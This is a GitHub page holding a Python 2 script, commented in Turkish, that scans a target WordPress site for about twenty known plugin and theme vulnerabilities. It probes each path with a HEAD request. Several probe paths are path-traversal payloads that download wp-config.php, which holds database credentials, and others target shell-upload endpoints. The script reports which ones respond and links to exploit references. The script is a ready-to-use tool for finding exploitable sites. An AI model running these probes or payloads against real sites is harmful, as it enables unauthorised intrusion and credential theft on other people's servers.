forked from Sertanblir/-Python-Wordpress-Exploit-Scanner
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathWordpress_Exploit_Scanner.py
102 lines (74 loc) · 4.28 KB
/
Wordpress_Exploit_Scanner.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
import sys
import urllib2
import re
import time
import httplib
import random
W = '\033[0m' # beyaz
R = '\033[31m' # kirmizi
G = '\033[1;32m' # koyu yesil
O = '\033[33m' # turuncu
B = '\033[34m' # mavi
P = '\033[35m' # mor
C = '\033[36m' # sari
GR = '\033[37m' # gri
BAD_RESP = [400,401,404]
def main(path):
print "[+] Test:",host.split("/",1)[1]+path
try:
h = httplib.HTTP(host.split("/",1)[0])
h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
h.putheader("Host", host.split("/",1)[0])
h.endheaders()
resp, reason, headers = h.getreply()
return resp, reason, headers.get("Server")
except(), msg:
print "Hata Olustu Napion mk:",msg
pass
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def slowprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(8./90)
print G+"\n\t Wordpress Exploit Scanner "
slowprint (R+"\n\t Coded By "+O+"./vb.netEagLe"+O)
xpls = { "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" : ["WordPress CuckooTap Theme & eShop Arbitrary File Download","http://goo.gl/QRlPLT"],"/wp-admin/admin-
ajax.php?action=kbslider_show_image&img=../wp-config.php" : ["WordPress KenBurner Slider Arbitrary File Download","http://goo.gl/d7CXS9"] , "/wp-content/plugins/ck-and-
syntaxhighlighter/ckfinder/ckfinder.html" : ["WordPress CK-And-SyntaxHighLighter Arbitrary File Upload","http://goo.gl/Ws5ke4"], "/wp-includes/js/plupload" : ["Wordpress Js plupload Cross Site
Scripting","http://goo.gl/Uluyky"], "/wp-content/themes/myband/" : ["WordPress MyBand Theme Cross Site Scripting","http://goo.gl/dmuuaU"], "/wp-content/grand-media/" : ["WordPress Gmedia Gallery
1.2.1 Shell Upload","http://goo.gl/u6L2xz"] , "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" : ["WordPress Slider Revolution Responsive 4.1.4 File
Download","http://goo.gl/zl9bxe"], "/wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php" : ["WordPress Lead Octopus Power SQL Injection","http://goo.gl/a3hAB2"], "/wp-
content/plugins/fbgorilla/game_play.php" : ["WordPress FBGorilla SQL Injection","http://goo.gl/tuKbKc"], "/wp-content/plugins/tidio-gallery/popup-insert-help.php" : ["WordPress Tidio Gallery 1.1
XSS","link"] , "/wp-content/plugins/download-manager/wpdm-add-new-file.php" : ["WordPress Download Manager 2.6.8 Shell Upload","http://goo.gl/N90axF"] , "/wp-
content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php" : ["WordPress Premium Gallery Manager Shell Upload","http://goo.gl/agwDOu"], "/wp-
content/plugins/barclaycart/uploadify/uploadify.php" : ["WordPress Barclaycart Shell Upload","http://goo.gl/4SFV2q"], "/wp-content/plugins/page-flip-image-gallery/upload.php" : ["WordPress Page
Flip Image Gallery Shell Upload","http://goo.gl/Z1TkAJ"],"/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php" : ["WordPress dzs-videogallery Plugins Remote File Upload
Vulnerability","http://goo.gl/hJzcYg"], "/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download" : ["WordPress wp-FileManager File
Download","http://goo.gl/3D1oQ9"], "/wp-content/plugins/user-meta/framework/helper/uploader.php" : ["WordPress User Meta 1.1.1 Shell Upload","http://goo.gl/zyU1qR"] , "/trunk/src/wp-
includes/compat.php" : ["Wordpress 3.9.1 pluggable.php CSRF vulnerability" , "http://goo.gl/iL4uRs"] , "/wp-comments-post.php" : ["Wordpress 3.9.1-CSRF vulnerability" , "http://goo.gl/XmlhhJ"] ,
"/wp-content/plugins/wp-filemanager/" : ["wp-FileManager Download" , "http://goo.gl/MvH4eU"]}
if len(sys.argv) != 2:
print "Ornek: ketcap.py www.site.com\n"
sys.exit(1)
host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
if host[-1] != "/":
host = host+"/"
print "\n[+] Hedef",host
print "[+] ketcap.py yukleniyor:",len(xpls)
print "\n[+] Scanning Vuln\n"
for xpl,(poc,expl) in xpls.items():
resp,reason,server = main(xpl)
if resp not in BAD_RESP:
print ""
print G+"\t[+] Durum:",resp, reason
print G+"\t[+] Vuln:",poc
print G+"\t[+] ExpAdresi:",expl
print W
else:
print ""
print R+"\t[-] Durum:",resp, reason
print W
print "\n[-] islemler basarili\n"